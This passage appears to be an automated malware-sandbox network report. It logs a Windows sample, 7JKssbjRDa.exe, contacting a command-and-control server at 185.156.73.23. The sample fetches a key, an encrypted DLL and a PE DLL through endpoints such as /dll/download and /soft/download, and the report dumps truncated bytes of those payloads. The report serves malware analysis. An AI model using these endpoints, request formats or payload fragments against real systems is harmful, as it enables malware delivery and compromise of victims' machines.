Dec 20, 2024 16:33:11.144678116 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.145133018 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.145230055 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.145729065 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.145742893 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.145812988 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.145812988 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.146749020 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.146862030 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.146900892 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.147041082 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.147859097 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.147954941 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.147959948 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.147994995 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.148979902 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.148993015 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.149029016 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.149048090 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:11.150057077 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:11.150120974 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:13.803595066 CET	80	49881	185.156.73.23	192.168.2.6
Dec 20, 2024 16:33:13.805141926 CET	49881	80	192.168.2.6	185.156.73.23
Dec 20, 2024 16:33:18.483596087 CET	49881	80	192.168.2.6	185.156.73.23

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 20, 2024 16:31:54.435866117 CET	1.1.1.1	192.168.2.6	0xd971	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 20, 2024 16:31:54.435866117 CET	1.1.1.1	192.168.2.6	0xd971	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

185.156.73.23

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49793	185.156.73.23	80	6260	C:\Users\user\Desktop\7JKssbjRDa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:32:29.813419104 CET	414	OUT	GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:32:31.271990061 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:32:30 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:32:31.283751011 CET	388	OUT	GET /dll/key HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:32:32.117234945 CET	224	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:32:31 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 21 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73 Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
Dec 20, 2024 16:32:32.121937990 CET	393	OUT	GET /dll/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: 1 Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:32:32.721314907 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:32:32 GMT Server: Apache/2.4.52 (Ubuntu) Content-Disposition: attachment; filename="fuckingdllENCR.dll"; Content-Length: 97296 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED] Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEPOuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~\|jbK!N7R}T2bsq1L^!\|qD'sLnD@bn%0=bQ1+lQXO\|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
Dec 20, 2024 16:32:32.721340895 CET	1236	IN	Data Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU\|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
Dec 20, 2024 16:32:32.721350908 CET	1236	IN	Data Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd Data Ascii: Dp!lR7+2J^'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: rUz(-dFI?[VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
Dec 20, 2024 16:32:32.721363068 CET	1236	IN	Data Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4 Data Ascii: BGpwCy6$h$xZ\|YQ\|5#n&!w@Duhs:\|BFGc3_^MH_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
Dec 20, 2024 16:32:32.721724987 CET	1236	IN	Data Raw: 65 3b 47 31 40 6c 58 a4 f2 72 e0 62 45 fe 13 75 f3 bf 71 98 82 ed 0b 91 d9 fa 6f fb bb 0c b6 96 17 6c 50 87 9d 6a f0 e3 e5 e5 17 2f 04 e1 78 4b 7b ec a4 0a 66 3a c7 1b de e3 06 f4 33 94 a4 66 e3 66 11 87 2a 50 e7 5f f0 a7 8b 90 b0 e7 20 a1 56 ea Data Ascii: e;G1@lXrbEuqolPj/xK{f:3ff*P_ VufJJh2~Uz=;6DmjDX,t3{etiOaB?hcMT#iHyKg7`Cx6'JgYOL(>@2O0inol%t-9'
Dec 20, 2024 16:32:32.721735001 CET	1236	IN	Data Raw: 18 fc a2 90 2b 67 71 38 68 4e e5 23 79 cf 33 c9 7b 68 89 24 07 d9 65 9b c2 05 5b 73 79 a0 fa 5d 0b 18 e7 03 da 3c 02 9a eb 59 06 94 8c a5 f8 69 3f f6 01 62 ec cb f9 de 45 fa 09 83 a3 f7 21 af d3 6f d5 a4 26 c7 c1 ee 10 d1 cd 23 d9 b7 3d bf ce a7 Data Ascii: +gq8hN#y3{h$e[sy]<Yi?bE!o&#=fmCALA-0BiwXV-+[X>Og{:i{It_v50#xa=cWBd/QFI6N' 3F$R/3Oqt]uqp3GU@(
Dec 20, 2024 16:32:32.721745014 CET	1236	IN	Data Raw: 86 d0 0e 0e f5 2b 0b f5 8d f7 79 40 71 81 e1 45 02 36 97 09 61 9b 5f dc b2 b1 d0 95 a0 5d 70 7b 40 b1 c5 76 fa 38 88 2f 7c 5a a9 00 9d 47 93 df 14 da 54 c6 55 b5 fc 8e fd 29 bf 7f d9 f7 52 82 c1 5f b3 a1 7d bb 48 e0 29 38 0d 63 13 83 b6 e2 b0 e0 Data Ascii: +y@qE6a_]p{@v8/\|ZGTU)R_}H)8c'ATd10?lg;&jg8KnWwD0a_r+42}20.u~Q$z2i@=sdkO8m(pC
Dec 20, 2024 16:32:32.721759081 CET	1236	IN	Data Raw: c3 9c 69 5d eb 54 db 81 bb 6b 66 5e ab f4 9b 3d ee ff 1b d1 4b 71 18 e1 6e 42 a8 ab 9c 98 14 85 99 99 0e a1 66 a6 1c 27 bd 4a b3 a3 d4 cf 6b 2b dc 89 26 b7 59 fe 26 0d 72 54 62 f2 c9 80 5f 45 0d 82 64 28 85 e9 69 0d 69 77 dd df e1 4d 16 de d3 9a Data Ascii: i]Tkf^=KqnBf'Jk+&Y&rTb_Ed(iiwM3mo.m4moNm09k-:zTzxGc\|Ub<\|Y>. Tu#f-UM!+g@!4<fG7IkEl
Dec 20, 2024 16:32:32.729504108 CET	1236	IN	Data Raw: bf 33 41 12 5b 52 91 a7 94 e0 e5 21 5d 8d 93 1b 30 af be 5e 8f 7b 94 24 bc 87 3d 50 74 38 00 cd a5 7b 35 ab 90 44 11 e5 40 7a 29 92 1d b3 4a 52 10 d4 8d 43 b3 ff 3c 6b 20 35 4a e1 86 bc f7 99 68 67 d7 c4 fb c8 a1 b9 38 b1 27 61 b3 3c e2 f9 cc 06 Data Ascii: 3A[R!]0^{$=Pt8{5D@z)JRC<k 5Jhg8'a<dIC2ui$wtHLnc}QJ4;[r\|^%<t5S[AIa+48*xs30SxNZCPH3U"~6GxeZE3 SZF&=Qt`d^u
Dec 20, 2024 16:32:32.730108976 CET	1236	IN	Data Raw: c8 a2 6d 52 66 a8 66 51 d1 c3 c9 87 9b d8 0b 44 57 eb 08 d8 cd bc b7 be b7 f1 4b 89 c0 b1 44 55 84 bc 8d 8d 36 2c c3 07 89 a5 46 50 8a ac fe f3 ba 23 4d 4f e4 0f 27 9f e1 11 07 f4 e0 e7 17 61 0e 07 54 3f cc 3f ae 3a 77 4d e4 44 61 15 b1 b3 97 25 Data Ascii: mRffQDWKDU6,FP#MO'aT??:wMDa%k;3?Bc\| yp`yzlSniVN(Bv}:XsOf.~zToX8n K$:D6Z%NNng=t+L~6DtFX[a/[
Dec 20, 2024 16:32:32.738009930 CET	1236	IN	Data Raw: d3 59 d3 30 18 53 4e 25 dc 9e 95 b9 da a6 3e 71 c0 45 79 32 7a f2 9f 43 ae e4 0b 25 8a bf 44 da e3 4d 77 72 50 8f 9d 18 42 0f 58 f1 b2 46 1d e6 97 70 c7 39 3b b2 a3 64 90 74 04 57 77 50 fc 49 1c ac 46 a7 37 5f 66 b7 fd b1 37 84 39 3f 7b d6 9b 57 Data Ascii: Y0SN%>qEy2zC%DMwrPBXFp9;dtWwPIF7_f79?{WdA_9qH1^S-;0_lc%.I5[j-(HK&c?EUXTVnMXyU47=`L4^9\7am:i`v{]
Dec 20, 2024 16:32:33.251843929 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:32:33.787786007 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:32:33 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:32:35.813429117 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:32:36.305159092 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:32:35 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:32:38.328995943 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:32:38.817686081 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:32:38 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:32:40.844329119 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:32:41.336776018 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:32:41 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:32:43.360033989 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:32:43.846036911 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:32:43 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:32:46.016999960 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:32:46.508332014 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:32:46 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:32:48.594345093 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:32:49.128417969 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:32:48 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:32:51.141871929 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:32:51.629704952 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:32:51 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0
Dec 20, 2024 16:32:53.641278982 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:32:54.127459049 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:32:53 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49853	185.156.73.23	80	6260	C:\Users\user\Desktop\7JKssbjRDa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:32:56.264939070 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:32:57.619879007 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:32:57 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49863	185.156.73.23	80	6260	C:\Users\user\Desktop\7JKssbjRDa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:32:59.761771917 CET	395	OUT	GET /files/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: C Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:33:01.121773005 CET	204	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:33:00 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49875	185.156.73.23	80	6260	C:\Users\user\Desktop\7JKssbjRDa.exe

Timestamp	Bytes transferred	Direction	Data
Dec 20, 2024 16:33:04.377582073 CET	394	OUT	GET /soft/download HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 User-Agent: d Host: 185.156.73.23 Connection: Keep-Alive Cache-Control: no-cache
Dec 20, 2024 16:33:05.863347054 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 20 Dec 2024 15:33:05 GMT Server: Apache/2.4.52 (Ubuntu) Content-Disposition: attachment; filename="dll"; Content-Length: 242176 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}:s(2rp(;&Vrprp(>}(Co(D(E}(F(E(G&>}(Co(D}(F(E(H&">}R} { oo{ "}!{!}{#{op{,{ oo{!oo{*Bsu
Dec 20, 2024 16:33:05.863363981 CET	224	IN	Data Raw: 00 00 0a 28 76 00 00 0a 2a 8a 02 7b 23 00 00 04 02 7b 23 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a a6 02 7b 1f 00 00 04 2c 0e 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2b 0c 02 02 7b 21 00 00 04 6f 6f 00 00 0a 02 28 32 Data Ascii: (v{#{#owox(+oy{,{ oo+{!oo(2z,{",{"o/(z((X[((X[((X[(q~(-(-(**~to(
Dec 20, 2024 16:33:05.863583088 CET	1236	IN	Data Raw: 33 00 00 06 02 74 13 00 00 01 17 6f b6 00 00 0a 2a 5e 28 b9 00 00 0a 72 e4 11 00 70 1b 6f ba 00 00 0a 15 31 02 17 2a 16 2a 3e 02 fe 15 10 00 00 02 02 03 7d 25 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a Data Ascii: 3to^(rpo1>}%(Co(D(E}%(F(E(&>}(Co(D}(F(E(&">}4{Eorprpo(j};({=
Dec 20, 2024 16:33:05.863595963 CET	1236	IN	Data Raw: 28 b7 00 00 06 2a 46 02 7b 63 00 00 04 6f ff 00 00 0a 74 11 00 00 01 2a 62 02 7b 63 00 00 04 03 6f 00 01 00 0a 02 73 fd 00 00 0a 6f e8 00 00 0a 2a 32 02 7b 64 00 00 04 6f 77 00 00 0a 2a 7e 02 7b 64 00 00 04 03 6f 79 00 00 0a 02 03 7d 5e 00 00 04 Data Ascii: (F{cotb{coso2{dow~{doy}^soF{dotb{doso2{eoN{eo(2{eoxR}[{eo{N>oo}N{X:}X
Dec 20, 2024 16:33:05.863939047 CET	1236	IN	Data Raw: 00 0a 2a 86 02 7b 84 00 00 04 6f 39 01 00 0a 02 28 07 01 00 06 6f 40 01 00 0a 6f 36 00 00 0a 6f 54 00 00 0a 2a 1e 02 7b 80 00 00 04 2a b6 02 7b 84 00 00 04 6f 39 01 00 0a 6f 42 01 00 0a 02 16 8d 65 00 00 01 7d 80 00 00 04 02 7b 83 00 00 04 72 a8 Data Ascii: {o9(o@o6oT{{o9oBe}{rpo2{o6{o2{of{o{oZ{orp(J{oo{6{o2{o*6{o
Dec 20, 2024 16:33:05.863951921 CET	672	IN	Data Raw: 04 02 72 a8 0f 00 70 7d af 00 00 04 02 73 6d 01 00 0a 7d b0 00 00 04 02 28 1f 00 00 0a 02 03 7d ae 00 00 04 2a 56 02 1f 0a 7d b1 00 00 04 02 28 7d 00 00 0a 02 28 8d 01 00 06 2a 1e 02 7b b1 00 00 04 2a 22 02 03 7d b1 00 00 04 2a 1e 02 7b b2 00 00 Data Ascii: rp}sm}(}V}(}({"}{"}{,(w}{(y{((t{,{(y((u{,{(y((*z,{,{o/(v
